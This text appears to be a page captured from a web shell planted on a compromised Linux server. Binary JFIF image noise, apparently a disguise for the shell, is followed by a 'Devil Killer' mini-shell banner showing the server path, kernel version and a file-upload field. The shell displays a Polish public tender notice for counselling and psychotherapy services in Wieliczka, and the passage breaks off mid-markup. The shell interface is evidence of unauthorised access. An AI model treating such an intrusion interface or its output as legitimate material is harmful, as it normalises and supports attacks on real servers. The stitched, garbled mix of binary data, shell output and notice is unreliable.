JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230916/0039955801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług specjalistycznego poradnictwa w ramach Ośrodka Interwencji Kryzysowej Powiatowego Centrum Pomocy Rodzinie w Wieliczce z podziałem na 3 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Wieliczce</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PCPR w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351623150</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepołomska 26G</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pcpr-wieliczka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcpr-wieliczka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług specjalistycznego poradnictwa w ramach Ośrodka Interwencji Kryzysowej Powiatowego Centrum Pomocy Rodzinie w Wieliczce z podziałem na 3 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-de86e400-5490-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00399558</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-de86e400-5490-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Postępowanie prowadzone jest w języku polskim.<br/>2) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl/.<br/>3) Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4) Komunikacja między Zamawiającym a Wykonawcami możliwa jest także poprzez email: zp@pcpr-wieliczka.pl z zastrzeżeniem w Części 1 pkt 10 ppkt 10) SWZ.<br/>5) Szczegółowe uregulowania w zakresie korespondencji zawiera SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia:<br/>a)	Komputer PC:<br/>- parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD,<br/>- zainstalowany jeden z poniższych systemów operacyjnych:<br/>•	MS Windows 7 lub nowszy,<br/>• OSX/Mac OS 10.10,<br/>•	Ubuntu 14.04,<br/>- Zainstalowana jedna z poniższych przeglądarek:<br/>•	Chrome 66.0 lub nowsza,<br/>•	Firefox 59.0 lub nowszy,<br/>•	Safari 11.1 lub nowsza,<br/>•	Edge 14.0 i nowsza<br/>albo<br/>b)	Tablet/Telefon:<br/>- Parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3,<br/>- Przeglądarka Chrome 61 lub nowa.<br/>2) Informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu +22 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z przetwarzaniem danych osobowych informujemy – zgodnie z art. 13 ust 1 i ust. 2 oraz art. 14 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L z 04.05.2016 r., Nr 119, s. 1) zwanego dalej „RODO” iż:<br/>1.	Administrator danych<br/>Administratorem danych osobowych jest Powiatowe Centrum Pomocy Rodzinie w Wieliczce – reprezentowane przez Dyrektora. Z Administratorem można się kontaktować pisemnie, za pomocą poczty tradycyjnej pod adresem: Powiatowe Centrum Pomocy Rodzinie w Wieliczce, ul. Niepołomska 26G, 32-020 Wieliczka lub poprzez email: sekretariat@pcpr-wieliczka.pl.<br/>2.	Inspektor danych osobowych<br/>Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod adresem e-mail: iod@iods.pl.<br/>3.	Źródło pozyskania danych<br/>Dane osobowe pozyskaliśmy bezpośrednio od Pani/Pana, a w przypadku, kiedy dane nie pochodzą od osoby, której te dane dotyczą są one pozyskane od kontrahenta, oferenta.<br/>4.	Podstawa prawna i cele przetwarzania danych osobowych<br/>Dane osobowe pozyskane w ramach złożonych ofert będą przetwarzane w celu:<br/>1)	wyłonienia Wykonawców na realizację zamówienia publicznego, a następnie w celu zawarcia i realizacji umowy (art. 6 ust. 1 lit. b RODO),<br/>2)	prawidłowej realizacji postępowania dotyczącego zamówienia publicznego oraz wypełnienia obowiązków prawnych ciążących na Administratorze, wynikających z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (art. 6 ust. 1 lit. c RODO).<br/>5.	Odbiorcy danych osobowych<br/>1)	Odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa.<br/>2)	Pani/Pana dane mogą być ponadto przekazywane podmiotom przetwarzającym dane osobowe na zlecenie Administratora np. dostawcom usług IT i innym podmiotom przetwarzającym dane w celu określonych przez Administratora – przy czym takie podmioty przetwarzają dane wyłącznie na podstawie umowy z Administratorem.<br/>6.	Okres przechowywania danych osobowych<br/>Dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas jej trwania.<br/>7.	Informacje o wymogu/dobrowolności podania danych osobowych oraz konsekwencji niepodania danych<br/>Podanie danych osobowych jest niezbędne dla celów określonych w pkt 4, a ich niepodanie będzie skutkowało niemożnością rozpatrzenia oferty i zawarcia umowy. <br/>8.	Prawa osób, których dane dotyczą<br/>W związku z przetwarzaniem Pani/Pana danych osobowych posiada Pani/Pan prawo do:<br/>1)	dostępu do treści swoich danych osobowych,<br/>2)	prawo do sprostowania danych,<br/>3)	ograniczenia przetwarzania danych osobowych,<br/>- na zasadach i warunkach wynikających z RODO.<br/>9.	Prawo wniesienia skargi do organu nadzorczego<br/>Posiada Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzasadnione jest, że Pana/Pani dane osobowe przetwarzane są przez Administratora niezgodnie z przepisami RODO.<br/>10.	Zautomatyzowane podejmowanie decyzji w tym profilowanie<br/>Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w tym w formie profilowania.<br/>11.	Przekazywanie danych osobowych do państwa trzeciego lub organizacji międzynarodowej<br/>Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271-13-23/210/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa części: Terapia rodzinna:<br/>1) Przedmiot zamówienia:<br/>a)	prowadzenie terapii rodzinnej w podejściu systemowym lub zintegrowanym,<br/>b)	prowadzenia dokumentacji odbytych konsultacji w teczkach klientów OIK,<br/>c)	współpraca z zespołem OIK w celu udzielania skutecznej pomocy klientom OIK,<br/>d)	wykonywanie innych czynności zawodowych w obszarze wsparcia rodzin.<br/>2) Termin realizacji umowy: od dnia podpisania umowy do 31-12-2024 r.<br/>3) Zamawiający przewiduje zlecenie Wykonawcy w całym okresie realizacji przedmiotu zamówienia maksymalnie 300 godzin usług, miesięcznie 20 godzin.<br/>4) Usługa będzie wykonywana w terminach ustalonych wspólnie z Zamawiającym nie rzadziej niż 5 godz. tygodniowo.<br/>5) miejsce świadczenia usług: stacjonarnie w budynku OIK w Wieliczce. W uzasadnionych przypadkach Zamawiający dopuszcza realizację usługi w formie zdalnych spotkań z wykorzystaniem narzędzi elektronicznych. Taka forma realizacji usługi, wymaga każdorazowo uzgodnienia z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>- C – cena brutto za jedną godzinę świadczenia usługi- 60%<br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiast pozostali Wykonawcy – odpowiednio mniej punktów, według poniższego wzoru:<br/>C = cena minimalna / cena oferty badanej x 60<br/>- D - doświadczenie Wykonawcy” – 40%<br/>Kryterium „doświadczenie Wykonawcy” rozumiane jest jako doświadczenie terapeutyczne osoby (specjalisty) wskazanej do realizacji usługi i oceniane będzie pod kątem ilości miesięcy posiadanego doświadczenia zawodowego.<br/>Punkty w tym kryterium zostaną przyznane w następujący sposób:<br/>•	12 miesięcy – 0 pkt<br/>•	13 - 24 miesięcy – 10 pkt<br/>•	25 - 36 miesięcy– 20 pkt<br/>•	37 – 48 miesięcy – 30 pkt<br/>•	49 miesięcy i powyżej– 40 pkt<br/>Minimalna ilość miesięcy posiadanego doświadczenia terapeutycznego Wykonawcy to 12 miesięcy. Oferty zawierające doświadczenie terapeutyczne Wykonawcy krótsze niż 12 miesięcy, zostaną odrzucone jako nie spełniające wymagań SWZ.<br/>Za niewskazanie w Formularzu oferty ilości miesięcy doświadczenia zawodowego osoby (specjalisty) wskazane do realizacji usługi lub wykreślenie wszystkich wskazanych okresów doświadczenia, Wykonawca nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres doświadczenia Wykonawcy tj. okres 12 miesięcy.<br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>Zamawiający przyjmuje, że: 1 pkt = 1% S = C + D<br/>gdzie:<br/>S – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena brutto z jedną godzinę świadczenia usługi<br/>D – ilość punktów badanej oferty w kryterium doświadczenie Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa części: Psychoterapia indywidualna 1<br/>1) Przedmiot zamówienia:<br/>a)	prowadzenie spotkań psychoterapii indywidualnej w nurcie analitycznym lub Gestalt lub poznawczo – behawioralnym lub psychodynamicznym psychoterapii humanistycznej lub systemowym lub zintegrowanym,<br/>b)	prowadzenie dokumentacji odbytych konsultacji w teczkach klientów OIK,<br/>c)	współpraca z zespołem OIK w celu udzielania skutecznej pomocy klientom OIK,<br/>d)	wykonywanie innych czynności zawodowych w obszarze wsparcia rodziny.<br/>2) Termin realizacji umowy: od dnia podpisania umowy do 31-12-2024 r.<br/>3) Zamawiający przewiduje zlecenie Wykonawcy w całym okresie realizacji przedmiotu zamówienia maksymalnie 300 godzin usług, miesięcznie 20 godzin.<br/>4) Usługa będzie wykonywana w terminach ustalonych wspólnie z Zamawiającym nie rzadziej niż 5 godzin tygodniowo.<br/>5) Miejsce świadczenia usługi:<br/>usługa świadczona będzie stacjonarnie w budynku OIK w Wieliczce w dniach ustalonych z Zamawiającym. W uzasadnionych przypadkach Zamawiający dopuszcza realizację usługi w formie zdalnych spotkań z wykorzystaniem narzędzi elektronicznych, przy czym taka forma realizacji usługi, wymaga każdorazowo uzgodnienia z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/>- C – cena brutto za jedną godzinę świadczenia usługi- 60%<br/>Wykonawca, który zaproponuje najniższą cenę spośród ofert spełniających wymagania, otrzyma 60 punktów, natomiast pozostali Wykonawcy – odpowiednio mniej punktów, według poniższego wzoru:<br/>C = cena minimalna / cena oferty badanej x 60<br/>- D - doświadczenie Wykonawcy – 40%<br/>Kryterium „doświadczenie Wykonawcy” rozumiane jest jako doświadczenie terapeutyczne osoby (specjalisty) wskazanej do realizacji usługi i oceniane będzie pod kątem ilości miesięcy posiadanego doświadczenia zawodowego.<br/>Punkty w tym kryterium zostaną przyznane w następujący sposób:<br/>•	12 miesięcy – 0 pkt<br/>•	13 - 24 miesięcy – 10 pkt<br/>•	25 - 36 miesięcy– 20 pkt<br/>•	37 – 48 miesięcy – 30 pkt<br/>•	49 miesięcy i powyżej– 40 pkt<br/>Minimalna ilość miesięcy posiadanego doświadczenia terapeutycznego Wykonawcy to 12 miesięcy. Oferty zawierające doświadczenie terapeutyczne Wykonawcy krótsze niż 12 miesięcy, zostaną odrzucone jako nie spełniające wymagań SWZ.<br/>Za niewskazanie w Formularzu oferty ilości miesięcy doświadczenia zawodowego osoby (specjalisty) wskazane do realizacji usługi lub wykreślenie wszystkich wskazanych okresów doświadczenia, Wykonawca nie otrzyma dodatkowych punków w tym kryterium oceny ofert. W takim przypadku Zamawiający przyjmuje, że Wykonawca zaproponował najkrótszy okres doświadczenia Wykonawcy tj. okres 12 miesięcy.<br/>Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w SWZ oraz otrzyma największą liczbę punktów.<br/>Zamawiający przyjmuje, że: 1 pkt = 1% S = C + D<br/>gdzie:<br/>S – łączna ilość punktów badanej oferty<br/>C – ilość punktów badanej oferty w kryterium cena brutto z jedną godzinę świadczenia usługi<br/>D – ilość punktów badanej oferty w kryterium doświadczenie Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa części: Psychoterapia indywidualna 2<br/>1) Przedmiot zamówienia:<br/>a)	prowadzenie spotkań psychoterapii indywidualnej w nurcie analitycznym lub Gestalt lub poznawczo – behawioralnym lub psychodynamicznym psychoterapii humanistycznej lub systemowym lub zintegrowanym,<br/>b)	prowadzenie dokumentacji odbytych konsultacji w teczkach klientów OIK,<br/>c)	współpraca z zespołem OIK w celu udzielania skutecznej pomocy klientom OIK,<br/>d)	wykonywanie innych czynności zawodowych w obszarze wsparcia rodziny.<br/>2) Termin realizacji umowy: od dnia podpisania umowy do 31-12-2024 r.<br/>3) Zamawiający przewiduje zlecenie Wykonawcy w całym okresie realizacji przedmiotu zamówienia maksymalnie 300 godzin usług, miesięcznie 20 godzin.<br/>4) Usługa będzie wykonywana w terminach ustalonych wspólnie z Zamawiającym, nie rzadziej niż 5 godzin tygodniowo.<br/>5) Miejsce świadczenia usługi:<br/>usługa świadczona będzie stacjonarnie w budynku OIK w Wieliczce w dniach ustalonych z Zamawiającym. W uzasadnionych przypadkach Zamawiający dopuszcza realizację usługi w formie zdalnych spotkań z wykorzystaniem narzędzi elektronicznych, przy czym taka forma realizacji usługi, wymaga każdorazowo uzgodnienia z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span 